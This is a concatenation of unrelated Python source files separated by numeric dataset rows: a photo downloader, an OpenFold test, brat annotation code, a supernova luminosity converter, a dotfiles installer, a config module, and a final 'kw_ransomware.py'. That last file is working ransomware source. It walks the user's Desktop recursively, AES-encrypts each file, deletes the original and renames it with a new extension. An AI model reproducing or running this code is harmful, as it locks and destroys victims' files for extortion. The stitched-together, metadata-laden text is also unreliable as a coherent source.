sure the parent dir exists. directory = dirname(filename_jpg) if not isdir(directory): os.makedirs(directory) # Sleep to avoid bombarding the server self.sleep(1, 3) # Download it with requests. max_retries = int(self.config_requests_info()['max_retries']) retries = 0 while retries < max_retries: resp = requests.get(url, cookies=self.req_cookies, stream=True) if resp.status_code == 200: file = None try: content_type = resp.headers['content-type'] self.logger.info("Content Type: %s.", content_type) if content_type == 'image/jpeg': filename = filename_jpg elif content_type == 'image/png': filename = filename_png elif content_type == 'video/mp4': filename = filename_video else: self.logger.warning("Unsupported content type: %s", content_type) return for chunk in resp.iter_content(1024): if file is None: self.logger.info("Saving: %s", filename) file = open(filename, 'wb') file.write(chunk) self.logger.info("Finished saving %s", filename) finally: if file is not None: file.close() break else: msg = 'Error downloading %r. Retrying. Response:'+str(resp) retries += 1 self.logger.warning(msg, url) self.sleep(1, 5) def download_images(self): '''Login to tadpoles.com and download all user's images. ''' self.navigate_url(self.ROOT_URL) self.do_login() self.dump_cookies() self.add_cookies_to_browser() self.requestify_cookies() # Get application parameters self.app_params = self.browser.execute_script("return tadpoles.appParams") self.logger.info("Loaded Tadpoles parameters") # start off with child 0 (if more than one exists) self.current_child_ind = 0 for response in self.iter_urls(): try: if isinstance(response, Image): self.save_image(response) elif isinstance(response, Report): self.save_report(response) except DownloadError: self.logger.exception("Error while saving resource") except (KeyboardInterrupt): self.logger.info("Download interrupted by user") def find_by_xpath(self, selector, name='element', form=None): '''Find element by xpath, but catch NoSuchElementException to log which XPath is faulty ''' if form==None: form = self.browser try: el = form.find_element_by_xpath(selector) except NoSuchElementException: self.logger.info("Could not find %s using XPath %s. Stopping.", name, selector) sys.exit(0) return el # create a config file if one does not already exist/needs to be reset def create_config_file(file_name): cfg = ConfigParser() cfg['AUTHENTICATION'] = {} cfg['AUTHENTICATION']['username'] = '' cfg['AUTHENTICATION']['password'] = '' cfg['DOWNLOADS'] = {} cfg['DOWNLOADS']['max_retries'] = '5' cfg['DOWNLOADS']['default_download_dir'] = 'download' with open(file_name, 'w') as cfg_file: cfg.write(cfg_file) print("New configuration file generated!\n") print("Please edit 'settings.ini' and input your authentication information before continuing to use this script.\n") # open an already existing config file (assumes correct items) def read_config_file(file_name): cfg = ConfigParser() cfg.read(file_name) return cfg if __name__ == "__main__": settings = 'settings.ini' config = None if isfile(settings): config = read_config_file(settings) else: create_config_file(settings) input("Press any key to exit.") exit() with Client(config) as client: client.download_images()
39.272553
129
0.589903
2,490
20,461
4.673494
0.198795
0.030076
0.037295
0.010312
0.197817
0.137492
0.114978
0.073215
0.059466
0.044169
0
0.006702
0.299936
20,461
520
130
39.348077
0.805711
0.142417
0
0.116531
0
0.00813
0.143892
0.021854
0
0
0
0.001923
0
1
0.084011
false
0.01626
0.04336
0.01626
0.208672
0.00813
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4137ed760291cec3e1fabbc437a8f67ebd69c0e3
1,598
py
Python
tests/test_primitives.py
empyriumz/openfold
12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32
[ "Apache-2.0" ]
789
2021-11-12T16:12:21.000Z
2022-03-28T05:45:19.000Z
tests/test_primitives.py
empyriumz/openfold
12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32
[ "Apache-2.0" ]
84
2021-11-12T22:23:50.000Z
2022-03-29T01:06:06.000Z
tests/test_primitives.py
empyriumz/openfold
12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32
[ "Apache-2.0" ]
114
2021-11-12T16:00:57.000Z
2022-03-27T21:32:31.000Z
# Copyright 2021 AlQuraishi Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import torch import numpy as np import unittest from openfold.model.primitives import ( Attention, ) from tests.config import consts class TestLMA(unittest.TestCase): def test_lma_vs_attention(self): batch_size = consts.batch_size c_hidden = 32 n = 2**12 no_heads = 4 q = torch.rand(batch_size, n, c_hidden).cuda() kv = torch.rand(batch_size, n, c_hidden).cuda() bias = [torch.rand(no_heads, 1, n)] bias = [b.cuda() for b in bias] gating_fill = torch.rand(c_hidden * no_heads, c_hidden) o_fill = torch.rand(c_hidden, c_hidden * no_heads) a = Attention( c_hidden, c_hidden, c_hidden, c_hidden, no_heads ).cuda() with torch.no_grad(): l = a(q, kv, biases=bias, use_lma=True) real = a(q, kv, biases=bias) self.assertTrue(torch.max(torch.abs(l - real)) < consts.eps) if __name__ == "__main__": unittest.main()
29.592593
74
0.652691
232
1,598
4.344828
0.5
0.076389
0.031746
0.055556
0.175595
0.115079
0.059524
0.059524
0
0
0
0.012584
0.254068
1,598
53
75
30.150943
0.833054
0.349812
0
0
0
0
0.007805
0
0
0
0
0
0.035714
1
0.035714
false
0
0.178571
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4138061cddec526c0c1ef724b4f3f7ed6a87b8dc
17,315
py
Python
server/src/textannotations.py
sandernaert/brat
6468258fcb0f83e092169d8c7e88a036077aab5c
[ "CC-BY-3.0" ]
1
2017-09-25T20:53:58.000Z
2017-09-25T20:53:58.000Z
server/src/textannotations.py
sandernaert/brat
6468258fcb0f83e092169d8c7e88a036077aab5c
[ "CC-BY-3.0" ]
null
null
null
server/src/textannotations.py
sandernaert/brat
6468258fcb0f83e092169d8c7e88a036077aab5c
[ "CC-BY-3.0" ]
null
null
null
from projectconfig import TypeHierarchyNode, ProjectConfiguration from annotation import Annotations,TextLevelAnnotation, SimpleAnnotations from message import Messager from ApplicationScope import getAnnObject class NoTextLevelConf(Exception): def __init__(self): Exception.__init__(self) def __str__(self): return u'No text level annotations defined in configuration' class noValidAnswer(Exception): def __init__(self,answer): Exception.__init__(self) self.answer = answer def __str__(self): return u'%s is not a valid answer'%(self.answer) class noValidNextStep(Exception): def __init__(self,next_step): Exception.__init__(self) self.next_step = next_step def __str__(self): return u'%s is not a valid next step, check configuration'%(self.next_step) class TextAnnotations(object): '''this is the main class for annotations on textlevel It will read the projectconf and make all necesary classes. ''' def __init__(self,projectconf, ann=""): self.projectconf = projectconf self.lists = {} self.defs = {} self.startlists = {} self.selectedList = None #ann is not the entire Annotations object but only a list of textLevel annotations self.ann = ann text_types = [] try: text_types = self.projectconf.get_text_type_hierarchy() except KeyError: raise NoTextLevelConf() for i in text_types: if i.terms[0] == "Def": answer = Answer(i.arguments["id"][0], i.arguments["text"][0]) self.defs[answer.id] = answer elif i.terms[0] == "List": answers = {} nexts = {} index = 0 for answer in i.arguments["defs"]: answers[answer] = self.defs[answer] nexts[answer] = i.arguments["next"][index] index += 1 lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0],answers,nexts) self.lists[lst.id] = lst; self.startlists[lst.id] =StartList(self.defs,self.lists,lst) elif i.terms[0] == "SubList": answers = {} index = 0 check = False if "checkboxes" in i.arguments and i.arguments["checkboxes"][0] == "True": check = True for answer in i.arguments["defs"]: answers[answer] = self.defs[answer] if not check: nexts[answer] = i.arguments["next"][index] index += 1 else: nexts[answer] = i.arguments["next"][0] lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0],answers,nexts,True,check) self.lists[lst.id] = lst for annotation in self.ann: #TODO:Correct error if type is not found for i in self.startlists: if self.startlists[i].start.name == annotation.type: self.startlists[i].set_ann(annotation) break def set_ann(self, annotations): self.ann = annotations for annotation in self.ann: #TODO:Correct error if type is not found for i in self.startlists: if self.startlists[i].start.name == annotation.type: self.startlists[i].set_ann(annotation) break def select(self,_id,start_list=None,current_list=None): #~ if not self.selectedList and not start_list: #~ self.selectedList = self.startlists[_id[0]] #~ return self.startlists[_id[0]].currentList if not start_list: self.selectedList = self.startlists[_id[0]] return self.startlists[_id[0]].start elif start_list: self.selectedList = self.startlists[start_list] return self.selectedList.select(_id,current_list) def unselect(self,start_list, current_id): self.selectedList = self.startlists[start_list] if self.selectedList.followed_path: return self.selectedList.unselect(current_id) else: return None class StartList(object): def __init__(self,defs,lists,currentList, ann=""): self.defs = defs self.lists = lists self.start = currentList self.currentList = currentList self.followed_path = [] self.ann = ann def set_ann(self, annotation): self.ann = annotation if self.ann: for id_ in self.ann.ids: ids = id_.split(';') if 'input' in ids: text = self.ann.tail.split("|")[-1] self.currentList.set_input(text) self.followed_path.append(self.currentList.id) else: self.select(ids,self.currentList.id) def select(self,_id,current_list): try: next_step,changed = self.lists[current_list].select(_id) except: raise #Will remove all following answers if one is changed if changed: found = False new_path = [] for i in self.followed_path: if found: self.lists[i].clear() else: new_path.append(i) if i == current_list: found = True self.followed_path = new_path if not current_list in self.followed_path : self.followed_path.append(current_list) if(not next_step == "stop"): try: self.currentList = self.lists[next_step] except: raise noValidNextStep(next_step) else: self.currentList = "stop" #~ if not self.currentList == "stop": #~ try: #~ next_step = self.currentList.select(_id) #~ except: #~ raise noValidAnswer(_id) #~ self.followed_path.append(self.currentList.id) #~ if(not next_step == "stop"): #~ try: #~ self.currentList = self.lists[next_step] #~ except: #~ raise noValidNextStep(next_step) #~ else: #~ self.currentList = "stop" return self.currentList def unselect(self, current_id): index = 0 found = False if current_id == 'stop': self.currentList = self.lists[self.followed_path[-1]] return self.currentList for i in self.followed_path: if i == current_id: found = True break index += 1 if index == 0: return None index -= 1 self.currentList = self.lists[self.followed_path[index]] #~ self.currentList = self.start #~ if self.ann and len(self.ann.ids) >= 1: #~ for id_ in self.ann.ids[:-1]: #~ self.select(id_.split(';'),self.currentList.id) return self.currentList class AnswerList(object): #Has an id to identify the object and a name. #Keeps a list of possible answers, and for every answer there is an value that gives says what the next_step is #this can be the id of an other (sub)list or can be "stop" def __init__(self,id, name,answers,next_steps, sublist=False, checkboxes=False): self.name = name self.id = id self.answers = answers self.nexts = next_steps self.sublist = sublist self.checkboxes = checkboxes self.answerids = [] self.answertext = [] def select(self,_id): changed = False if not self.checkboxes and self.answerids and not self.nexts[_id[0]] == self.nexts[self.answerids[0]]: changed = True self.answerids = [] self.answertext = [] for i in _id: #i can be empty if no answers were selected in the checkboxes if i: self.answerids.append(i) self.answertext.append(self.answers[i].text) #this only works for checkboxes and is needed because _id doesn't always contain a value if self.checkboxes : for i in self.nexts: return self.nexts[i],changed return self.nexts[_id[0]],changed def set_input(self, _input): self.answerids = ['input'] self.answertext = [_input] def get_ids(self): return ';'.join(self.answerids) def get_texts(self): return ';'.join(self.answertext) def clear(self): self.answerids = [] self.answertext = [] def __str__(self): return u'%s\t%s' % (self.id,self.name) class Answer(object): def __init__(self,id, text): self.id = id self.text = text def __str__(self): return u'%s\t%s' % (self.id,self.text) def get_list(path,doc): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path ann =getAnnObject(path,doc) proj = ProjectConfiguration(real_dir) try: txt_lvl = TextAnnotations(proj,ann.get_textLevels()) except NoTextLevelConf as e: return {'exception' :str(e) } #~ if txt_lvl.currentList == "stop": #~ return {'stop':True, 'annotation':str(txt_lvl.selectedList.ann),} response = list_to_dict(txt_lvl.selectedList.currentList) #Back_pos tells if there is still atleast 1 answer left that can be removed response["back_pos"] = False if len(txt_lvl.followed_path) >0 : response["back_pos"] = True return response def get_startlist(path,doc): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path ann =getAnnObject(path,doc) proj = ProjectConfiguration(real_dir) try: txt_lvl = TextAnnotations(proj,ann.get_textLevels()) except NoTextLevelConf as e: return {'exception' :str(e) } response = startlist_to_dict(txt_lvl.startlists) #Back_pos tells if there is still atleast 1 answer left that can be removed response["back_pos"] = False return response def select(path,doc,_id,start_list=None, current_list=None): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path proj = ProjectConfiguration(real_dir) try: import simplejson as json _id = json.loads(_id) txt_lvl = TextAnnotations(proj) if start_list: answerlist = txt_lvl.startlists[start_list].start with getAnnObject(path, doc) as ann: ann_txtLvl = ann.get_textLevels() annotation = None for i in ann_txtLvl: if i.type == answerlist.name: annotation = i if not annotation: ann_id = ann.get_new_id('F') ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[])) annotation = ann.get_ann_by_id(ann_id) ann_txtLvl = ann.get_textLevels() txt_lvl.set_ann(ann_txtLvl) response = txt_lvl.select(_id,start_list,current_list) update_annotations(ann,annotation, txt_lvl.startlists[start_list]) else: ann = getAnnObject(path,doc) ann_txtLvl = ann.get_textLevels() if ann_txtLvl: txt_lvl.set_ann(ann_txtLvl) response = txt_lvl.select(_id,start_list) except Exception,e : raise return {'exception' :str(e) } if response == "stop": return {'stop':True , 'annotation':str(txt_lvl.selectedList.ann),} return list_to_dict(response) def unselect(path,doc,start_list, current_id): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path from message import Messager with getAnnObject(path, doc) as ann: proj = ProjectConfiguration(real_dir) ann_txtLvls = ann.get_textLevels() if not ann_txtLvls: return get_startlist(path,doc) txt_lvl = TextAnnotations(proj,ann_txtLvls) response_list = txt_lvl.unselect(start_list,current_id) #answerlist = txt_lvl.startlists[start_list].start #~ for i in ann_txtLvls: #~ if i.type == answerlist.name: #~ update_annotations(ann,i, txt_lvl.startlists[start_list]) #~ break if response_list: response = list_to_dict(response_list) else: response = get_startlist(path,doc) return response def input_text(path,doc,_id,text,start_list, current_list=None): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path proj = ProjectConfiguration(real_dir) txt_lvl = TextAnnotations(proj) answerlist = txt_lvl.startlists[start_list].start with getAnnObject(path, doc) as ann: ann_txtLvls = ann.get_textLevels() annotation = None for i in ann_txtLvls: if i.type == answerlist.name: annotation = i if annotation: txt_lvl.set_ann(ann_txtLvls) else: ann_id = ann.get_new_id('F') ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[])) annotation = ann.get_ann_by_id(ann_id) #~ ann_txtLvls = ann.get_textLevels() #~ if annotation.tail: #~ annotation.tail += ";" txt_lvl.startlists[start_list].currentList.set_input(text) txt_lvl.startlists[start_list].currentList = 'stop' if not current_list in txt_lvl.startlists[start_list].followed_path: txt_lvl.startlists[start_list].followed_path.append(current_list) update_annotations(ann,annotation, txt_lvl.startlists[start_list]) #~ annotation.tail += text #~ annotation.ids.append(_id) return {'stop':True, 'annotation':str(annotation),} def update_annotations(ann,ann_txtLvl, txt_lvl): #update annotation for file if len(txt_lvl.followed_path) == 0: ann.del_annotation(ann_txtLvl) return 0 ann_txtLvl.tail = "" ann_txtLvl.ids = [] for i in txt_lvl.followed_path: ann_txtLvl.tail += txt_lvl.lists[i].get_texts()+'|' ann_txtLvl.ids.append(txt_lvl.lists[i].get_ids()) #remove extra ";" at end if ann_txtLvl.tail: ann_txtLvl.tail=ann_txtLvl.tail[:-1] def list_to_dict(answer_list): response = {'name':answer_list.name, 'id':answer_list.id, 'nexts':answer_list.nexts, 'sublist':answer_list.sublist, 'stop':False, 'checkboxes':answer_list.checkboxes,} keys = answer_list.answers.keys() keys.sort() response['answer_ids'] = [ a for a in keys ] response['answer_texts'] = [ answer_list.answers[a].text for a in keys ] if 'input' in answer_list.answerids: response['answers']= answer_list.answertext[0] else: response['answers']= answer_list.answerids response["back_pos"] = True return response def startlist_to_dict(answer_list): response = {'name':'', 'id':'', 'answers':[], 'sublist':False, 'stop':False,'checkboxes':False} #a is the id keys = answer_list.keys() keys.sort() response['answer_ids'] = [ a for a in keys ] response['answer_texts'] = [ answer_list[a].start.name for a in keys ] return response if __name__ == "__main__": proj = ProjectConfiguration("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment") #~ proj.get_text_type_hierarchy() #ann = Annotations("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment/sporza") #textann = TextAnnotations(proj,ann.get_textLevels()) #print textann.select(['0.2'],'0') #print textann.select(['1.2','1.3'],'0') #print textann.select(['5.2'],'0') #~ print "STARTLISTS" #~ print "###################" #~ print #~ print "LISTS" #~ print textann.lists #~ print "###################" #~ print #~ print "DEFS" #~ print textann.defs #~ print "###################" #~ print "#####SELECT########" #~ print textann.select('0.2','0') #detijd_other_Bekaert_12-05-05 #~ import cProfile #~ cProfile.run('get_startlist("/brat_vb/sentiment/","sporza")') print get_list("/voorbeeld/","sporza") #~ print select('/brat_vb/sentiment/','sporza','0') #~ #print "#####UNSELECT#######" #~ print unselect('/brat_vb/sentiment/','sporza','0') #~ print select('/brat_vb/sentiment/','sporza','0.1','0')
38.222958
119
0.583483
2,040
17,315
4.771569
0.104412
0.019725
0.023423
0.021574
0.486439
0.437949
0.39059
0.333984
0.321759
0.303781
0
0.005166
0.306844
17,315
452
120
38.307522
0.805866
0.147733
0
0.468391
0
0
0.038002
0.004284
0
0
0
0.002212
0
0
null
null
0
0.045977
null
null
0.002874
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
4138547503fa6fe8d1074b5b2c7712299cb4ca8e
55
py
Python
Python Scripts/lesson_137_main.py
jessequinn/udemy_python_complete
b97e657dea2a8680557949f01ac80d3230c82c41
[ "MIT" ]
null
null
null
Python Scripts/lesson_137_main.py
jessequinn/udemy_python_complete
b97e657dea2a8680557949f01ac80d3230c82c41
[ "MIT" ]
null
null
null
Python Scripts/lesson_137_main.py
jessequinn/udemy_python_complete
b97e657dea2a8680557949f01ac80d3230c82c41
[ "MIT" ]
null
null
null
a =3 b = "tim" c = 1, 2, 3 print(a) print(b) print(c)
6.875
11
0.509091
14
55
2
0.571429
0
0
0
0
0
0
0
0
0
0
0.097561
0.254545
55
7
12
7.857143
0.585366
0
0
0
0
0
0.054545
0
0
0
0
0
0
1
0
false
0
0
0
0
0.5
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
3
4138a7bccc894c41843ad8dd0583587c67038959
1,466
py
Python
python/Lumniosity_Converter.py
pbrown801/aggienova-templates
24f1269bf26ab8026a27df87358f80ea8ad04933
[ "MIT" ]
2
2019-09-23T18:42:12.000Z
2019-09-30T04:17:10.000Z
python/Lumniosity_Converter.py
pbrown801/aggienova-templates
24f1269bf26ab8026a27df87358f80ea8ad04933
[ "MIT" ]
12
2019-02-20T18:38:25.000Z
2022-03-13T02:32:57.000Z
python/Lumniosity_Converter.py
pbrown801/aggienova-templates
24f1269bf26ab8026a27df87358f80ea8ad04933
[ "MIT" ]
1
2020-01-14T17:26:33.000Z
2020-01-14T17:26:33.000Z
import pandas as pd import numpy as np import math from dust_extinction.parameter_averages import F19 def extinction_adjustment(rv): len_wave=len(sn_templ['Wavelength']) wavenum_waves = [1/(a/10000) for a in sn_templ['Wavelength']] ext_model = F19(Rv=rv) return(pd.Series(ext_model(wavenum_waves))) def Dm_to_Lum(sn_name): def Grab_Lum(Dist_mod, Flux): P_cm= 3.08567758128*10**(18) D_cm= 10**((Dist_mod/5)+1)*P_cm S_a= 4*np.pi*D_cm**2 lum= Flux*S_a return lum idex= swift.loc[swift.isin([sn_name]).any(axis=1)].index.tolist() idex=idex[0] Dist_mod= swift['Dist_mod_cor'][idex] Lum= pd.Series(sn_templ.apply(lambda row: Grab_Lum(Dist_mod=Dist_mod, Flux= row['Flux']), axis=1)) Lum=Lum/extinction_adjustment(3.1) Lum=pd.DataFrame({'MJD': sn_templ['MJD'], 'Wavelength': sn_templ['Wavelength'], 'Luminosity': Lum.tolist()}) return Lum def Lum_conv(sn_name,output_file): global swift swift= pd.read_csv('../input/NewSwiftSNweblist.csv') global sn_templ '''Input desired template file name with Flux''' sn_templ= pd.read_csv(output_file) sn_name= sn_name.replace("_uvot","") '''Input name of supernovae''' lum_templ= Dm_to_Lum(sn_name) return lum_templ if __name__ == "__main__": l=Lum_conv('SN2005cs_uvot','../output/TEMPLATE/SN2005cs_uvot_SNIa_series_template.csv') # print(type(l)) # extinction_adjustment(3.1)
28.745098
112
0.677353
230
1,466
4.03913
0.391304
0.052745
0.054898
0.019376
0.027987
0
0
0
0
0
0
0.038907
0.175989
1,466
51
113
28.745098
0.730132
0.027967
0
0
0
0
0.137546
0.064684
0
0
0
0
0
1
0.121212
false
0
0.121212
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413b8b891d2f44221bdddfd4cafbe2d545ac748d
4,076
py
Python
bin/dotty.py
jgrip/dotfiles
78e96c3eaa1bb64d9197b23115bb1f144d4ca184
[ "Unlicense" ]
null
null
null
bin/dotty.py
jgrip/dotfiles
78e96c3eaa1bb64d9197b23115bb1f144d4ca184
[ "Unlicense" ]
null
null
null
bin/dotty.py
jgrip/dotfiles
78e96c3eaa1bb64d9197b23115bb1f144d4ca184
[ "Unlicense" ]
null
null
null
#!/usr/bin/env python3 from __future__ import print_function # Copyright (C) 2015 Vibhav Pant <vibhavp@gmail.com> # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. import json import os import shutil from sys import stderr import argparse # Fix Python 2.x. try: input = raw_input except NameError: pass def ask_user(prompt): valid = {"yes":True, 'y':True, '':True, "no":False, 'n':False} while True: print("{0} ".format(prompt),end="") choice = input().lower() if choice in valid: return valid[choice] else: print("Enter a correct choice.", file=stderr) def create_directory(path): exp = os.path.expanduser(path) if (not os.path.isdir(exp)): print("{0} doesnt exist, creating.".format(exp)) os.makedirs(exp) def create_symlink(src, dest, replace): dest = os.path.expanduser(dest) src = os.path.abspath(src) broken_symlink = os.path.lexists(dest) and not os.path.exists(dest) if os.path.lexists(dest): if os.path.islink(dest) and os.readlink(dest) == src: print("Skipping existing {0} -> {1}".format(dest, src)) return elif replace or ask_user("{0} exists, delete it? [Y/n]".format(dest)): if os.path.isfile(dest) or broken_symlink or os.path.islink(dest): os.remove(dest) else: shutil.rmtree(dest) else: return print("Linking {0} -> {1}".format(dest, src)) try: os.symlink(src, dest) except AttributeError: import ctypes symlink = ctypes.windll.kernel32.CreateSymbolicLinkW symlink.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32) symlink.restype = ctypes.c_ubyte flags = 1 if os.path.isdir(src) else 0 symlink(dest, src, flags) def copy_path(src, dest): dest = os.path.expanduser(dest) src = os.path.abspath(src) if os.path.exists(dest): if ask_user("{0} exists, delete it? [Y/n]".format(dest)): if os.path.isfile(dest) or os.path.islink(dest): os.remove(dest) else: shutil.rmtree(dest) else: return print("Copying {0} -> {1}".format(src, dest)) if os.path.isfile(src): shutil.copy(src, dest) else: shutil.copytree(src, dest) def run_command(command): print("Running {0}".format(command)) os.system(command) def main(): parser = argparse.ArgumentParser() parser.add_argument("config", help="the JSON file you want to use") parser.add_argument("-r", "--replace", action="store_true", help="replace files/folders if they already exist") args = parser.parse_args() js = json.load(open(args.config)) os.chdir(os.path.expanduser(os.path.abspath(os.path.dirname(args.config)))) if 'directories' in js: [create_directory(path) for path in js['directories']] if 'link' in js: [create_symlink(src, dst, args.replace) for src, dst in js['link'].items()] if 'copy' in js: [copy_path(src, dst) for src, dst in js['copy'].items()] if 'install' in js and 'install_cmd' in js: packages = ' '.join(js['install']) run_command("{0} {1}".format(js['install_cmd'], packages)) if 'commands' in js: [run_command(command) for command in js['commands']] print("Done!") if __name__ == "__main__": main()
34.837607
96
0.639352
581
4,076
4.416523
0.359725
0.046765
0.021824
0.023383
0.213172
0.160171
0.125487
0.125487
0.125487
0.125487
0
0.011832
0.232826
4,076
116
97
35.137931
0.808762
0.187929
0
0.202381
0
0
0.121966
0
0
0
0
0
0
1
0.071429
false
0.011905
0.083333
0
0.202381
0.107143
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413c30019b7152204c51cd4030495eeb971c8934
2,472
py
Python
sltxpkg/config.py
EagleoutIce/sltx-inst
cb45346177c22fd5bf47f29cebf34f09f16b9a4b
[ "MIT" ]
null
null
null
sltxpkg/config.py
EagleoutIce/sltx-inst
cb45346177c22fd5bf47f29cebf34f09f16b9a4b
[ "MIT" ]
null
null
null
sltxpkg/config.py
EagleoutIce/sltx-inst
cb45346177c22fd5bf47f29cebf34f09f16b9a4b
[ "MIT" ]
null
null
null
import os import sys from pathlib import Path from sltxpkg import globals as sg from sltxpkg import util as su from sltxpkg.globals import (C_CACHE_DIR, C_CREATE_DIRS, C_DOWNLOAD_DIR, C_DRIVER_LOG, C_TEX_HOME, C_WORKING_DIR) from sltxpkg.log_control import LOGGER from sltxpkg.types import SltxDependencies def write_to_log(data: str): if sg.configuration[C_DRIVER_LOG].strip(): with open(sg.configuration[C_DRIVER_LOG], 'a') as f: f.write(data) if not data.endswith('\n'): f.write("\n") def load_configuration(file: str): """Apply given configuration file to the sltx config Args: file (str): The configuration file to load """ y_conf = su.load_yaml(file) sg.configuration = {**sg.configuration, **y_conf} def expand_url(path: str, cwd: Path) -> str: return "" if path is None else path.format(cwd=str(cwd.parent)) def load_dependencies_config(file: str, target: dict) -> SltxDependencies: """Apply given dependency file to the sltx dep list Args: file (str): The file to load target (dict): The target dependency-collection to append it to (won't be modified) Returns: dict: The target dict with the added dependencies """ y_dep = su.load_yaml(file) if 'dependencies' in y_dep: for dep in y_dep['dependencies']: dep_data = y_dep['dependencies'][dep] if 'url' in dep_data: dep_data['url'] = expand_url( dep_data['url'], Path(file).absolute()) return {**target, **y_dep} def assure_dir(name: str, target_path: str, create: bool): if not os.path.isdir(target_path): if create: LOGGER.info("> %s: %s not found. Creating...", name, target_path) os.makedirs(target_path) else: LOGGER.error("! Not allowed to create " + name + ". Exit") sys.exit(1) def assure_dirs(): sg.configuration[C_TEX_HOME] = su.get_sltx_tex_home() # expansion create = sg.configuration[C_CREATE_DIRS] assure_dir('Tex-Home', sg.configuration[C_TEX_HOME], create) for config, name in [(C_WORKING_DIR, 'Working-Dir'), (C_DOWNLOAD_DIR, 'Download-Dir'), (C_CACHE_DIR, 'Cache-Dir')]: sg.configuration[config] = os.path.expanduser( sg.configuration[config]) # expansion assure_dir(name, sg.configuration[config], create)
32.96
91
0.636327
342
2,472
4.423977
0.280702
0.099141
0.052875
0.029081
0.06345
0
0
0
0
0
0
0.00054
0.250809
2,472
74
92
33.405405
0.816415
0.147654
0
0
0
0
0.073408
0
0
0
0
0
0
1
0.130435
false
0
0.173913
0.021739
0.347826
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413c68cef2a9cdf443fb29e050740dc6fceb6953
2,896
py
Python
kw_ransomware.py
CodmingOut/SecretProjectAI
addc43117eab30a25453c18fa042739c33cc6cfb
[ "MIT" ]
null
null
null
kw_ransomware.py
CodmingOut/SecretProjectAI
addc43117eab30a25453c18fa042739c33cc6cfb
[ "MIT" ]
null
null
null
kw_ransomware.py
CodmingOut/SecretProjectAI
addc43117eab30a25453c18fa042739c33cc6cfb
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Nov 24 21:32:11 2020 @author: kw """ import glob import os, random, struct import getpass from Cryptodome.Cipher import AES class makeMyRansomware: def __init__(self, your_extension=".Example", key=b'keyfor16bytes123', username=getpass.getuser()): self.your_extension = your_extension self.key = key self.username = username def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024): if not out_filename: out_filename = in_filename + self.your_extension iv = os.urandom(16) encryptor = AES.new(key ,AES.MODE_CBC, iv) filesize = os.path.getsize(in_filename) with open(in_filename, 'rb') as infile: with open(out_filename, 'wb') as outfile: outfile.write(struct.pack('<Q', filesize)) outfile.write(iv) while True: chunk = infile.read(chunksize) if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += b' ' * (16 - len(chunk) % 16) outfile.write(encryptor.encrypt(chunk)) def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024): if not out_filename: out_filename = os.path.splitext(in_filename)[0] with open(in_filename, 'rb') as infile: origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0] iv = infile.read(16) decryptor = AES.new(key, AES.MODE_CBC, iv) with open(out_filename, 'wb') as outfile: while True: chunk = infile.read(chunksize) if len(chunk) == 0: break outfile.write(decryptor.decrypt(chunk)) outfile.truncate(origsize) def Encryptor(self, startPath): for filename in glob.iglob(startPath, recursive=True): if(os.path.isfile(filename)): print('Encrypting> ' + filename) self.encrypt_file(self.key, filename) os.remove(filename) def Decryptor(self, startPath): for filename in glob.iglob(startPath, recursive=True): if(os.path.isfile(filename)): fname, ext = os.path.splitext(filename) if (ext == self.your_extension): print('Decrypting> ' + filename) self.decrypt_file(self.key, filename) os.remove(filename) if __name__ == "__main__": import time Ransom1 = makeMyRansomware(".Hello") startpath = 'c:/Users/'+Ransom1.username+'/Desktop/**' #You can encrypt or decrypt like this 